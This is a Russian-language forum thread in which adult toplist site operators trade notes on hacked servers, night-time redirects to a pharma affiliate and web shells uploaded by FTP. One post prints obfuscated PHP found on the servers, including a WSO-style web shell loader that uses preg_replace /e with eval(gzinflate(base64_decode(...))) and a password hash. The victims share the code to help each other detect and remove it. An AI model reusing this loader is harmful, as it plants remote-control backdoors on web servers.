Новая тема   Ответить

 salo
gimcnuk. Тоже на ум приходит такая мысль, находил я на серваке search.php? есть такой в ГБ, так вот он был поменян на saerch.php. Он был изменен apache. Я его удалил (код там вражеский был) Еще бы знать файлы с каким расширением могут быть потенциально опасными

 Alexandur
Ну, поиск (в смысле search.php) в топлистах без особой надобности. Его тоже можно удалить.
Попробуй Код:

 salo
если установлен бекдор, то ведь логи сервера должны отображать чужие id входы, а нет только мои заходы стоят. Может ходят через мой комп? Аутпост секюрити ничего не перехватывает, троев нет, и не блокирует ничего подозрительного.

 Alexandur
Почему чужие? Через дыру влит скрипт, им всё делается. Как раз от имени апача.

 CrazyMen
ДА сколько же можно уже?! Чтоб у него хуй отсох (С) У меня щас не отображает количество кликов сделаных от трейдеров все пересмотрел нет ничего что криво настроено. На одном топе пошли показатели хз че делать

 salo
нет редирект не проявляется сейчас, он проявляется ночью, параметры редиректа прописаны четко у хакера, ip, браузер, режим времени запуска редиректа. Блять как найти бэкдор?

 salo
траф-то на спосах сразу проседает, значит редиректит

 CrazyMen
salo: Я с тобой бро! Что делать БЛЯТЬ!!!!!!!!!!!!!!!!!!!!!!!!! П-А-М-А-Г-И-Т-Е!

 Alexandur
Я же написал, грепом пройдитесь. Либо визуально, подозрительные файлы, каких не должно быть

 Big Voo
жесть бля какая то творится

парни держитесь !

 salo
нашел какие-то подозрительные EXmain, EXmain2, дожны быть только main, main2. удалил

 salo
но они не php, а html, смотрим дальше

 salo
ну что ребята нашел Web Shell by oRb залит по Ftp, когда блокировка по ip не стояла
/home/имя/domains/domen.com/public_html/transcock/archive/stats/stats.php? От него пошли public_html/stat.php по доменам. Саппорт хоста помог

 salo
Все хакерские файлы php

 Danyil
И мне саппорт помог.
Четыре вебшелла вычислили...

 Danyil
Может в ту фарм партнёрку, куда хакер этот болезный там редиректит, заабузить и его акк там прибьют?

 Дольчик ххх
Самое интересное я отписывал в тут ПП когда были первые атаки, мне из той партнерки ответили, что вот емейл данного партнера и пишите ему напрямую ))) хотя в сл. атаку надо бы найти, совершенно стороннею машинку и на ней покликать без ативирусника и узнать всего его айди в ПП ;)

 CrazyMen
Парни у кого хоститесь? мой сапоорт якобы проверил нихера не ннашел походу и не искали. если что скиньте в личку плиз. спасибо за инфу будем искать

 salo
CrazyMen: отписал в личку

 CrazyMen
Друзбя! Нашел я вот что файлы содержались в папке datafiles у всех топо по разному
isp16.php
isp23.php
isp27.php
isp81.php
с кодом

<?php ${"G\x4cOBAL\x53"}["\x6e\x6d\x63x\x6a\x6bg\x65\x6f\x79\x6fe"]="a\x75th\x5fpass";${${"\x47\x4cO\x42AL\x53"}["\x6e\x6d\x63\x78jk\x67\x65\x6f\x79o\x65"]}="a\x660\x3209\x65\x36\x3102\x35\x31d4\x355\x616\x36\x65feb\x3840\x38\x376\x31\x33";${"G\x4cO\x42\x41\x4c\x53"}["\x6av\x72f\x6b\x6c\x65\x74o"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";${"\x47L\x4fB\x41\x4c\x53"}["\x78yqc\x63\x78x\x68\x78\x6f\x76"]="\x6f\x6bR\x31\x77\x4b\x74\x6fya\x64\x4cX\x36\x44l\x36\x74\x44\x673W\x78\x56\x78\x46\x6f\x48\x68k\x6a6Y\x6e/x\x63='\x29\x29\x29\x3B","\x2e");
?>

Вес файла примерно 56,8кб

usaagent.php

С кодом

<?php
$auth_pass = "af0209e610251d455a66efeb84087613"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQj/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>

Вес файла 22,7кб

Так же есть во всех топах в папке datafiles файл jsp.php весом примерно 168байт
с кодом

<?$a=$_SERVER["HTTP_USER_AGENT"]."aaaaaaaaaa";$jsum=abs(ord($a[0])+ord($a[1])*ord($a[2])+ord($a[3])*ord($a[4])+ord($a[5])-ord($a[6])*ord($a[7])-ord($a[8])*ord($a[9]));?>
Но наверное это стандартный от скрипта.

Ищи у себя все чтонайдете отпишите!

 CrazyMen
Короче опять... Уже в папке темплейтс фаил _foot.phtml содержимое одинаковое что и у других. Сука я из за него не могу сетку геев поднять блять! Зашел топ проверить а там кликов 0 у всех пиздец приплыли думаю. Проверил так и есть опять то же

 Bruno
Народ, че вы так паритесь со скриптом который ломают через день, грубо говоря. Попробуйте поюзать для топ трейда смартсж, вполне мощный скрипт, много статсов, мультиадминка.
Два -три -5 мастеров отпишите автору в асю что хотите импорт трейдеров с гбтоп, он это спецом для вас сделает, и перенос не составит проблем.

 Дольчик ххх
CrazyMen - на топах которые перевел на новый хост??? (появился код?)
Bruno - Попробывал поставить смарт, а там оказывается не так просто залил и через фтп клиент и через браузер установил, там надо через шел и т.д. не так все просто! ;)

 CrazyMen
Нет. На новый сервер не переезжал. Каким образом он закидывает я не знаю. Но все в одно время закинуты. Имена почти разные файлов.

 Bruno
Дольчик ххх писал:

Поставить то его как раз и не проблема. Шел - разве проблема счас? Делаешь по мануалу и скрипт ставится. А вот когда поставишь, настраивать его, там море фич, там уже посложнее.